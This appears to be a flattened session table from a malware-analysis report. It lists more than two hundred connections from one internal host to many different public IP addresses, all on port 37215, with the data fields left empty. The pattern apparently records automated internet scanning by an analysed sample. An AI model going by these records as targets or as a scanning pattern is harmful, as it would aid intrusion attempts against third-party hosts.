                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13590192.168.2.154742877.250.181.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13591192.168.2.1544938190.16.12.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13592192.168.2.155658445.190.251.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13593192.168.2.153421294.219.56.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13594192.168.2.1535934102.152.152.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13595192.168.2.154773431.78.93.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13596192.168.2.1535470195.106.47.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13597192.168.2.1550762190.42.89.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13598192.168.2.1556714181.210.160.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13599192.168.2.1548014222.56.227.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13600192.168.2.155658631.83.29.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13601192.168.2.1546624181.68.186.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13602192.168.2.1533306181.220.208.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13603192.168.2.1536742122.94.245.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13604192.168.2.154433041.124.208.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13605192.168.2.1537244186.71.94.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13606192.168.2.155721094.100.109.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13607192.168.2.1557000157.61.231.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13608192.168.2.155515241.36.54.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13609192.168.2.1544846190.238.200.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13610192.168.2.1552042186.87.216.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13611192.168.2.1559416190.151.220.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13612192.168.2.1555730122.33.78.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13613192.168.2.154034237.237.28.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13614192.168.2.1534896190.174.250.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13615192.168.2.153794631.238.230.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13616192.168.2.156030237.214.209.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13617192.168.2.1539368156.4.195.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13618192.168.2.156045631.254.179.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13619192.168.2.1534022102.123.55.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13620192.168.2.1538154157.56.136.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13621192.168.2.153986631.68.217.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13622192.168.2.1540748197.239.34.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13623192.168.2.1559488138.8.210.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13624192.168.2.1545586222.114.203.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13625192.168.2.1545976138.169.233.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13626192.168.2.1557866157.48.183.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13627192.168.2.154931638.98.194.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13628192.168.2.153553631.6.173.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13629192.168.2.1556742121.56.166.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13630192.168.2.1546442121.227.2.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13631192.168.2.1557608138.242.195.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13632192.168.2.1538644122.201.92.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13633192.168.2.1535250157.71.136.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13634192.168.2.1550938156.73.13.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13635192.168.2.154140445.248.51.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13636192.168.2.1535618157.237.57.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13637192.168.2.1537738121.49.252.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13638192.168.2.1552722222.69.85.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13639192.168.2.1548930222.139.226.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13640192.168.2.154061245.115.42.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13641192.168.2.155863637.149.167.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13642192.168.2.1551172181.17.233.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13643192.168.2.155160045.59.68.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13644192.168.2.1558604222.7.42.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13645192.168.2.1541018186.217.137.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13646192.168.2.1560966156.11.176.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13647192.168.2.1553322122.22.169.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13648192.168.2.1536100181.69.134.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13649192.168.2.1540536122.153.133.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13650192.168.2.1540740190.54.239.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13651192.168.2.1549968197.229.69.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13652192.168.2.1542424181.218.244.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13653192.168.2.156012037.153.22.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13654192.168.2.155883494.94.239.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13655192.168.2.1558654222.80.232.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13656192.168.2.154713437.64.219.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13657192.168.2.1554002157.31.240.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13658192.168.2.153527245.122.225.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13659192.168.2.1542232190.185.77.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13660192.168.2.1535594122.251.217.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13661192.168.2.1555230138.100.141.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13662192.168.2.1558812190.203.225.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13663192.168.2.1552754157.112.142.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13664192.168.2.1545622122.71.199.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13665192.168.2.154938431.28.57.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13666192.168.2.155867641.146.113.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13667192.168.2.1554722122.230.177.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13668192.168.2.154068631.33.242.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13669192.168.2.153606231.84.106.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13670192.168.2.1541660157.161.154.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13671192.168.2.154478245.199.77.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13672192.168.2.1559586122.93.86.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13673192.168.2.1541134156.222.51.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13674192.168.2.154761631.40.94.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13675192.168.2.1553622102.49.97.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13676192.168.2.1553596138.185.181.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13677192.168.2.1553196138.203.39.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13678192.168.2.1560054121.87.134.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13679192.168.2.154363237.223.64.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13680192.168.2.1541442222.67.34.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13681192.168.2.154228837.31.52.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13682192.168.2.1541432181.4.72.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13683192.168.2.1538660138.255.86.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13684192.168.2.154094837.54.228.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13685192.168.2.153470241.76.103.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13686192.168.2.154861259.13.151.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13687192.168.2.1557800138.121.19.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13688192.168.2.155408894.87.28.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13689192.168.2.153507245.112.26.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13690192.168.2.1536364186.81.24.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13691192.168.2.1542408190.99.77.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13692192.168.2.1545684102.219.246.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13693192.168.2.1544398181.136.189.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13694192.168.2.154642637.95.135.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13695192.168.2.1556662121.58.8.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13696192.168.2.154746041.115.131.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13697192.168.2.155140041.126.83.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13698192.168.2.1553768122.152.60.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13699192.168.2.1537924190.155.30.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13700192.168.2.1552180222.245.3.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13701192.168.2.1539356156.88.116.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13702192.168.2.1541140197.211.41.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13703192.168.2.155116231.18.222.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13704192.168.2.1538232156.29.105.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13705192.168.2.1552880190.156.138.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13706192.168.2.1536786102.200.248.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13707192.168.2.154774841.102.110.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13708192.168.2.1557624183.127.224.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13709192.168.2.1543534197.154.238.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13710192.168.2.155247637.69.109.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13711192.168.2.155413045.130.73.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13712192.168.2.155476437.238.254.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13713192.168.2.155345231.217.69.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13714192.168.2.1537760190.147.4.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13715192.168.2.1535284138.188.162.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13716192.168.2.153927837.79.231.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13717192.168.2.154339245.66.127.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13718192.168.2.1549078157.16.118.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13719192.168.2.1557008222.171.41.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13720192.168.2.1550682197.80.254.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13721192.168.2.154852437.93.114.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13722192.168.2.1550660156.200.10.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13723192.168.2.154779441.70.74.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13724192.168.2.1542698156.22.186.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13725192.168.2.1547296181.109.6.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13726192.168.2.154386845.80.116.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13727192.168.2.1545836138.116.250.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13728192.168.2.1556680222.229.66.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13729192.168.2.1559258222.231.143.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13730192.168.2.1542954122.203.173.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13731192.168.2.1556688121.23.123.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13732192.168.2.1542396207.82.226.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13733192.168.2.1554648156.112.64.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13734192.168.2.1548410197.168.201.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13735192.168.2.155193445.255.18.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13736192.168.2.1551582222.69.107.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13737192.168.2.1550108122.234.73.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13738192.168.2.1536432181.83.229.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13739192.168.2.155427094.245.114.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13740192.168.2.1552270138.228.213.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13741192.168.2.1560688138.71.102.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13742192.168.2.1533944156.151.140.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13743192.168.2.153873431.76.15.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13744192.168.2.1540658156.86.231.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13745192.168.2.155055245.90.176.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13746192.168.2.1543854222.79.93.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13747192.168.2.155695045.130.99.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13748192.168.2.153576218.73.25.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13749192.168.2.1552668197.173.188.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13750192.168.2.1542348102.145.251.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13751192.168.2.1546144157.79.171.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13752192.168.2.1545366121.198.135.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13753192.168.2.155015245.16.20.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13754192.168.2.1537838138.71.84.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13755192.168.2.1545822190.125.61.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13756192.168.2.155266641.76.68.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13757192.168.2.153718694.43.176.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13758192.168.2.1542398157.97.67.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13759192.168.2.1546618121.250.82.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13760192.168.2.1553368156.138.76.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13761192.168.2.1556502102.62.248.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13762192.168.2.1555156138.22.125.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13763192.168.2.155856845.217.13.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13764192.168.2.155934431.74.24.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13765192.168.2.1539424102.141.152.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13766192.168.2.1532904156.132.51.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13767192.168.2.1544532102.58.123.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13768192.168.2.1556572121.11.73.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13769192.168.2.155599241.157.53.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13770192.168.2.155544431.138.242.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13771192.168.2.1557028156.141.187.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13772192.168.2.1555020222.49.54.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13773192.168.2.1555268190.36.0.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13774192.168.2.1559908102.32.228.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13775192.168.2.1533298197.38.103.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13776192.168.2.1549364181.46.230.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13777192.168.2.154605294.158.174.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13778192.168.2.1545510138.100.164.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13779192.168.2.153293841.53.137.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13780192.168.2.154242231.6.157.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13781192.168.2.153452094.175.167.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13782192.168.2.1552794121.185.65.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13783192.168.2.1551266144.241.107.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13784192.168.2.1559838186.214.130.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13785192.168.2.1541234181.41.0.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13786192.168.2.1537344122.35.122.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13787192.168.2.154171245.64.93.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13788192.168.2.1548686156.98.171.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13789192.168.2.1557334102.8.223.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13790192.168.2.1540432121.33.225.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13791192.168.2.153873641.93.251.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13792192.168.2.1557758157.17.76.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13793192.168.2.1552654186.16.108.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13794192.168.2.1552218157.91.42.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13795192.168.2.154437294.109.128.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13796192.168.2.1560876121.178.105.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13797192.168.2.1543000156.211.182.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13798192.168.2.1551874186.27.145.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13799192.168.2.1549966121.33.85.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13800192.168.2.154321275.134.241.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13801192.168.2.1559608122.85.107.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13802192.168.2.1551934121.224.58.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13803192.168.2.1557574169.116.62.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13804192.168.2.1554344181.245.139.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13805192.168.2.154469631.227.186.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13806192.168.2.1550698101.180.241.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13807192.168.2.1556712190.132.241.24037215
                                              TimestampBytes transferredDirectionData


